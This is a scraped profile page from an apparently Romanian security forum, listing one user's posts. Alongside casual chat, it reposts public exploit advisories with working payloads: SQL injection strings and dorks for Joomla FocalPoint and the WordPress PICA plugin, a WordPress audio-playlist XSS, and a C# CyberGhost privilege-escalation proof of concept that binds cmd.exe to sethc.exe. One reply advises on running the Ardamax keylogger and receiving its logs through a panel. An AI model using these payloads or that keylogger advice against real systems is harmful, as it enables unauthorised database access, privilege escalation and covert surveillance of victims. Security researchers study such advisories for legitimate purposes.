Jump to content


Active Members
  • Posts

  • Joined

  • Last visited

  • Days Won


KhiZaRix last won the day on March 26 2015

KhiZaRix had the most liked content!

About KhiZaRix

  • Birthday 08/29/1982

Profile Information

  • Gender

Contact Methods

  • Skype


  • Biography
  • Location
  • Interests
  • Occupation
    Boss la Operator stradal

Recent Profile Visitors

4843 profile views

KhiZaRix's Achievements


Newbie (1/14)

  • Week One Done Rare
  • One Month Later Rare
  • One Year In Rare

Recent Badges



  1. Bine ai venit , like la prezentare.
  2. Eram sigur =))) am stat ceva timp prin Slatina.
  3. Joomla FocalPoint component version 1.2.3 suffers from a remote SQL injection vulnerability. # Exploit Title: Joomla Component FocalPoint 1.2.3 - SQL Injection # Date: 2017-03-23 # Home : https://extensions.joomla.org/extensions/extension/maps-a-weather/maps-a-locations/focalpoint/ # Exploit Author: Persian Hack Team # Discovered by : Mojtaba MobhaM (kazemimojtaba@live.com) # Home : http://persian-team.ir/ # Google Dork : inurl:index.php?option=com_focalpoint # Telegram Channel AND Demo: @PersianHackTeam # Tested on: WIN # POC : id Parameter Vulnerable to SQL Injection Put a String Value in id Parameter http://www.target.com/index.php?option=com_focalpoint&view=location&id=[SQL]&Itemid=135 # Greetz : T3NZOG4N & FireKernel & Milad Hacking And All Persian Hack Team Members # Iranian White Hat Hackers Sursa/Source: https://packetstormsecurity.com/files/141793/Joomla-FocalPoint-1.2.3-SQL-Injection.html
  4. Prin ce oraș? pare ff cunoscut
  5. okay , cand se termină , adică Joi , vă contactez și vă explic.
  6. Stegano 0.6.9 Changes: Introduces some type hints (PEP 484). More tests for the generators and for the tools module. Updated descriptions of generators. Fixed a bug with a generator that has been previously renamed. Download: https://packetstormsecurity.com/files/download/141598/Stegano-0.6.9.tar.gz
  7. Salut , am să te contactez pe private și am să-ți explic.
  8. CODE : # # # # # # Exploit Title: WordPress Plugin PICA Photo Gallery v1.0 - SQL Injection # Google Dork: N/A # Date: 09.03.2017 # Vendor Homepage: https://www.apptha.com/ # Software: https://www.apptha.com/category/extension/Wordpress/PICA-Photo-Gallery # Demo: http://www.apptha.com/demo/pica-photo-gallery # Version: 1.0 # Tested on: Win7 x64, Kali Linux x64 # # # # # # Exploit Author: Ihsan Sencan # Author Web: http://ihsan.net # Author Mail : ihsan[@]ihsan[.]net # # # # # # SQL Injection/Exploit : # http://localhost/[PATH]/?aid=[SQL] # For example; # -3+/*!50000union*/+select+0x496873616e2053656e63616e3c62723e7777772e696873616e2e6e6574,2,3,@@version--+- # wpapptha_term_relationships,wpapptha_term_taxonomy,wpapptha_terms,wpapptha_usermeta,wpapptha_users # Etc.. # # # # # Source/Sursa: https://packetstormsecurity.com/files/141533/WordPress-PICA-Photo-Gallery-1.0-SQL-Injection.html
  9. Stegano is a basic Python Steganography module. Stegano implements two methods of hiding: using the red portion of a pixel to hide ASCII messages, and using the Least Significant Bit (LSB) technique. It is possible to use a more advanced LSB method based on integers sets. The sets (Sieve of Eratosthenes, Fermat, Carmichael numbers, etc.) are used to select the pixels used to hide the information. Changes: Fixed an error when revealing a hidden binary file in an image. Download: https://packetstormsecurity.com/files/download/141562/Stegano-0.6.8.tar.gz Source: https://packetstormsecurity.com/files/141562/Stegano-0.6.8.html
  10. WordPress version 4.5.3 Audio Playlist suffers from a cross site scripting vulnerability. CODE: ------------------------------------------------------------------------ WordPress audio playlist functionality is affected by Cross-Site Scripting ------------------------------------------------------------------------ Yorick Koster, July 2016 ------------------------------------------------------------------------ Abstract ------------------------------------------------------------------------ Two Cross-Site Scripting vulnerabilities exists in the playlist functionality of WordPress. These issues can be exploited by convincing an Editor or Administrator into uploading a malicious MP3 file. Once uploaded the issues can be triggered by a Contributor or higher using the playlist shortcode. ------------------------------------------------------------------------ OVE ID ------------------------------------------------------------------------ OVE-20160717-0003 ------------------------------------------------------------------------ Tested versions ------------------------------------------------------------------------ This issue was successfully tested on the WordPress version 4.5.3. ------------------------------------------------------------------------ Fix ------------------------------------------------------------------------ These issues are resolved in WordPress version 4.7.3. ------------------------------------------------------------------------ Details ------------------------------------------------------------------------ https://sumofpwn.nl/advisory/2016/wordpress_audio_playlist_functionality_is_affected_by_cross_site_scripting.html It was discovered that meta information (ID3) stored in audio files are not properly sanitized in case they are uploaded by a user with the unfiltered_html (generally an Editor or Administrator). The first Cross-Site Scripting vulnerability exists in the function that processes the playlist shortcode, which is done in the wp_playlist_shortcode() method (/wp-includes/media.php). This method creates a <noscript> block for users with JavaScript disabled. The method wp_get_attachment_link() does not perform any output encoding on the link text. Meta information from the audio file is used in the link text, rendering wp_playlist_shortcode() vulnerable to Cross-Site Scripting. The second Cross-Site Scripting issue is DOM-based and exists in the JavaScript file /wp-includes/js/mediaelement/wp-playlist.js (or /wp-includes/js/mediaelement/wp-playlist.min.js). The WPPlaylistView object is used to render a audio player client side. The method renderTracks() uses the meta information from the audio file in a call to jQuery's append() method. No output encoding is used on the meta information, resulting in a Cross-Site Scripting vulnerability. Proof of concept The following MP3 file can be used to reproduce this issue: https://securify.nl/advisory/SFY20160742/xss.mp3 1) upload MP3 file to the Media Library (as Editor or Administrator). 2) Insert an Audio Playlist in a Post containing this MP3 (Create Audio Playlist). ------------------------------------------------------------------------ Summer of Pwnage (https://sumofpwn.nl) is a Dutch community project. Its goal is to contribute to the security of popular, widely used OSS projects in a fun and educational way. Sursa/Source: https://packetstormsecurity.com/files/141491/WordPress-4.5.3-Audio-Playlist-Cross-Site-Scripting.html
  11. # Exploit CyberGhost Privilege Escalation # Date: 06.03.2017 # Software Link: http://www.cyberghostvpn.com/ # Exploit Author: Kacper Szurek # Contact: https://twitter.com/KacperSzurek # Website: https://security.szurek.pl/ # Category: local 1. Description `CG6Service` service has method `SetPeLauncherState` which allows launch the debugger automatically for every process we want. https://security.szurek.pl/cyberghost-6042205-privilege-escalation.html 2. Proof of Concept using System; using CyberGhost.Communication; namespace cyber { class Program { static void Main(string[] args) { Console.WriteLine("CyberGhost Privilege Escalation"); Console.WriteLine("by Kacper Szurek"); Console.WriteLine("http://security.szurek.pl/"); Console.WriteLine("https://twitter.com/KacperSzurek"); PeLauncherOptions options = new PeLauncherOptions(); options.ExecuteableName = "sethc.exe"; options.PeLauncherExecuteable = @"c:\Windows\System32\cmd.exe"; EventSender CyberGhostCom = CyberGhostCom = new EventSender("CyherGhostPipe"); CyberGhostCom.SetPeLauncherState(options, PeLauncherOperation.Add); Console.WriteLine("Now logout and then press SHIFT key 5 times"); } } } Sursa/Source: https://packetstormsecurity.com/files/141455/CyberGhost-
  12. @NickyRo Din cate știam Ardamaxu era bun. Doar că ți-aș recomanda să nu te joci cu focul. Și referitor la email, nu ți-aș recomanda pe email, ci un panel ceva.
  13. https://gyazo.com/55dca29bc0759fe726411422c1062bf5 Nu prea mult cu vorbe goale , doar puțină bătaie de cap. Mi-a luat aproximativ o oră să fac tot / testez. Diff: Moderat Reward: 404 HINT: Razele de lumină au fost oprite de către Caesar. Pentru mici HINT-uri, PM Succes. Se termină pe : 16.03.2017 Au rezolvat: #1 @u0m3 #2 @Usr6 #3 @new_luca #4 @Hertz
  • Create New...